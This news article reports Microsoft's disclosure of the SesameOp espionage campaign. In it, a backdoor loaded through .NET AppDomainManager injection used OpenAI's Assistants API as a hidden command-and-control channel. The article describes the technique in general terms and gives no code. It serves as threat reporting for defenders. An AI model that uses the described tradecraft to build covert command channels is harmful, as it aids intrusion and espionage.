Microsoft Uncovers Hackers’ Abuse of OpenAI API in Espionage Operation

Hackers Weaponized OpenAI Assistants API in Sophisticated Espionage Campaign

The420 Web Desk
4 Min Read

In a rare intersection of artificial intelligence and cyber-espionage, Microsoft has uncovered a sophisticated hacking campaign that weaponized OpenAI’s Assistants API as a covert communication channel. The operation, codenamed SesameOp, represents a new frontier in how state-linked or advanced threat actors are blending legitimate AI tools with malicious infrastructure.

A Hidden Channel Within Legitimate AI Systems

Microsoft’s security team revealed that the attackers behind SesameOp repurposed OpenAI’s Assistants API — typically used for creating custom AI agents — to establish communication between their command-and-control (C&C) servers and a stealthy backdoor deployed on targeted systems.

The operation, described by Microsoft as “highly persistent and espionage-oriented,” enabled the attackers to maintain access to compromised environments for months. By disguising their traffic as ordinary API queries, the group effectively hid in plain sight, evading traditional network detection tools.

The malware’s commands were routed through compromised Visual Studio processes, which loaded malicious libraries using a technique called .NET AppDomainManager injection. The attackers then used these modified processes to manage infected devices remotely, indicating a design for long-term persistence.

“Centre for Police Technology” Launched as Common Platform for Police, OEMs, and Vendors to Drive Smart Policing

Inside the ‘SesameOp’ Backdoor

At the core of the attack was a loader saved in the system’s temporary directory as OpenAIAgent.Netapi64, a dynamic link library (DLL) that functioned as a delivery mechanism for the backdoor.

Once installed, the malware connected to OpenAI’s infrastructure, querying the attacker’s vector store to identify hostnames of infected machines. If a hostname wasn’t found, the backdoor created a new entry — effectively registering the compromised system within the attacker’s OpenAI account.

The malicious agent then fetched a list of “Assistants” — each representing a separate instruction set — from the attacker’s account. These Assistants included identifiers, descriptions, and instruction parameters used to send encoded payloads.

According to Microsoft, the backdoor recognized three types of descriptions: Sleep, Payload, and Result. The first two directed the malware to wait or execute commands; the third transmitted the output back to OpenAI as a “message,” completing a full feedback loop within the API itself.

Microsoft’s Response and OpenAI’s Action

Microsoft’s investigation traced the malicious behavior to a compromised API key linked to an OpenAI account believed to have been used by the threat actor. Once notified, OpenAI disabled both the key and the associated account, effectively cutting off the communication channel.

In a joint disclosure, Microsoft noted that while the incident demonstrates no vulnerability in OpenAI’s platform, it underscores a growing concern — the hijacking of AI services as infrastructure for covert cyber operations.

OpenAI confirmed that the affected API key had been disabled and announced plans to deprecate the Assistants API by August 2026, signaling a shift toward tighter security and abuse detection measures across its ecosystem.

AI’s New Frontier: Tool or Threat

By embedding their communication within legitimate AI workflows, the attackers effectively used OpenAI’s platform as a proxy for command relay, bypassing traditional defense mechanisms that focus on suspicious domains or encrypted tunnels.

Security analysts warn that as AI platforms become more deeply integrated into enterprise software, their APIs may present new opportunities for abuse — not by exploiting vulnerabilities, but by manipulating functionality for stealth and persistence.

In Microsoft’s view, SesameOp represents “a landmark in adversarial innovation,” a chilling reminder that even the architectures designed to power next-generation intelligence can, in the wrong hands, serve as the backbone of deception.

Stay Connected